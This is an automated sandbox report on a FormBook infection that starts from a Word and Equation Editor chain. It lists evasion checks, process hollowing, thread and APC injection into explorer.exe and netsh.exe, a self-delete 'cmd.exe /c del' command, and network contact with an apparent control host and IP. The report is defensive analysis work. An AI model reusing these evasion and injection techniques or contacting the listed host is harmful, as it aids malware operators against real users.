Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: princedan85671.exe, 00000004.00000002.2181838241.0000000002451000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Window / User API: threadDelayed 1631 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2572 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe TID: 2492 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 2524 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: princedan85671.exe Binary or memory string: 3V97MjDwzNY10/CE3FdlPTc3QDRJmTHAfugGZ6zy6kRSVp+JZqpfk8Ffo9rd0+zrd2KPwKN3IwbD9bQLswwzDhyn4PdAUcVsBK5n\77208IwpEVv/3DMWkIIYr+GO0CgNtkcu/AzuJ1M8gweiCBUod5UYqcxkP0QAKl0hwizDJ5b4pZws5eikxSjRN4UuQgGFVmciINBjSJ\7NLLQdzKojxbpxogKKZWM8B1Zm8STIrPk9ANQxogWqeZZSr2a6ZmW+yC
Source: princedan85671.exe, 00000004.00000002.2181838241.0000000002451000.00000004.00000001.sdmp Binary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: explorer.exe, 00000007.00000000.2211182513.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.2194776377.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: princedan85671.exe, 00000004.00000002.2181838241.0000000002451000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000007.00000000.2194586401.00000000041AD000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: princedan85671.exe Binary or memory string: drNC7TIZTDW2xdJg6023IiTjmTuQlBYEtkPt+T/Us4SLdWi2qlCcddJ8V\7R0tAT+wpPaK51PoqE0nSbQ8X0gIV1QeMUdu7fBCInEO6ADyk+Y6Pj50bA89PiZBRwnUO9K3Ns0/btgvn5n7ypGhhTP0mZCoNxZCnK\7nl3WEoY5NqGqiGi1R8cYbO9DuvgNpNPQlR0tOwm091GcDraPdworFfl+/7zsOq5SWDlDvKmIEUiEy8m9CKUXDLxi9/PJynX1DX
Source: princedan85671.exe, 00000004.00000002.2181838241.0000000002451000.00000004.00000001.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: explorer.exe, 00000007.00000000.2211227110.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: princedan85671.exe Binary or memory string: w9pCcvmCiBslevp3ENTZ7Gyl/KlvjcVV5O5tkWLNvHWw9ziuxOZ14kJmcS95b5CG53h40gwz2mI1prpmN63K34RqlKTfBw\782M5soaHLKwjrxjbF44wWMH/mXEYo9EtG3RCo8RZu8v2iOPMGsDtVxMtQ/RInns4u4kM+YSRbJmUomHt2yet9GjBmvzKjwGocN5e2\7S6Ai96HFLuDqu3p28Ouz3oupVo6bq9Tq4z84+QXrbm011Rn3/M4xD+nOhVufu
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_0040ACD0 LdrLoadDll, 6_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A026F8 mov eax, dword ptr fs:[00000030h] 6_2_00A026F8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C800EA mov eax, dword ptr fs:[00000030h] 8_2_00C800EA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C80080 mov ecx, dword ptr fs:[00000030h] 8_2_00C80080
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA26F8 mov eax, dword ptr fs:[00000030h] 8_2_00CA26F8
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.anandsharmah.com
Source: C:\Windows\explorer.exe Network Connect: 45.64.105.11 80 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory allocated: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1300000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 7EFDE008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\princedan85671.exe C:\Users\user\AppData\Roaming\princedan85671.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process created: C:\Users\user\AppData\Local\Temp\princedan85671.exe C:\Users\user\AppData\Local\Temp\princedan85671.exe vgyjnbhui Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\princedan85671.exe' Jump to behavior
Source: explorer.exe, 00000007.00000000.2184289883.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.2184289883.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.2211182513.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.2184289883.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Queries volume information: C:\Users\user\AppData\Roaming\princedan85671.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs